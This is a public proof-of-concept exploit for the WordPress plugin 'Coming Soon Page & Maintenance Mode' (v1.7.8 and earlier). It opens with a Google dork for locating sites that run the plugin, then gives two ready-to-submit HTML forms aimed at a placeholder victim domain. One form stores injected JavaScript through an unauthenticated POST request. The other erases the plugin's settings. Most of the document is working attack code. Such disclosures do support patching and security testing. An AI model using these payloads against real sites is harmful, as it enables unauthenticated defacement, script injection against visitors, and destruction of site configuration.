/*!
* # Exploit Title: Coming Soon Page & Maintenance Mode v1.7.8 Unauthenticated Persistent XSS Injection
* # Google Dork: inurl:"wp-content/plugins/responsive-coming-soon"
* # Date: 2019/07/20
* # Original researcher: Ryan Dewhurst [twitter.com/ethicalhack3r]
* # PoC Author: m0ze
* # Vendor Homepage: https://wpshopmart.com/
* # Software Link: https://wordpress.org/plugins/responsive-coming-soon/
* # Version: <= 1.7.8
* # Tested on: WordPress v5.2.2 + Coming Soon Page & Maintenance Mode v1.7.8
* # CVE: -
* # CWE: CWE-79
*/
::- Details & Description -::
~ The «Coming Soon Page & Maintenance Mode» plugin, which has more than 7.000 active installations, was vulnerable to persistent XSS Injection and settings reset possibility that allowed an unauthenticated attacker to inject JavaScript or HTML code into the blog front-end or simply erase all existed settings.
::- Special Note -::
~ Please pay attention that I'm not the original researcher, I'm making the PoC public.
::- PoC [Unauthenticated Persistent XSS Injection] -::
~ Simple POST request, no auth is needed.
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"></head>
<body>
<form action="http://victimdomain.com/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon" method="POST">
<input type="hidden" name="action_rcs" value="action_rcs_page_setting_save_post" />
<input type="hidden" name="hook" value="general" />
<input type="hidden" name="rcsp_logo_url" value="http://victimdomain.com/wp-content/plugins/responsive-coming-soon/img/wp.png" />
<input type="hidden" name="logo_width" value="13" />
<input type="hidden" name="logo_height" value="13" />
<input type="hidden" name="logo_enable" value="on" />
<input type="hidden" name="rcsp_headline" value="m0ze was here" />
<input type="hidden" name="rcsp_description" value="<script>alert('m0ze');</script>" />
<input type="hidden" name="home_sec_link_txt" value="m0ze" />
<input type="submit" value="Submit Data" />
</form>
</body>
</html>
::- PoC [Unauthenticated Settings Reset] -::
~ Another simple POST request, no auth is needed.
<!DOCTYPE html>
<html>
<head><meta charset="utf-8"></head>
<body>
<form action="http://victimdomain.com/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon" method="POST">
<input type="hidden" name="action_rcs_reset" value="action_rcs_page_setting_reset_post" />
<input type="hidden" name="hook" value="general" />
<input type="submit" value="Submit Data" />
</form>
</body>
</html>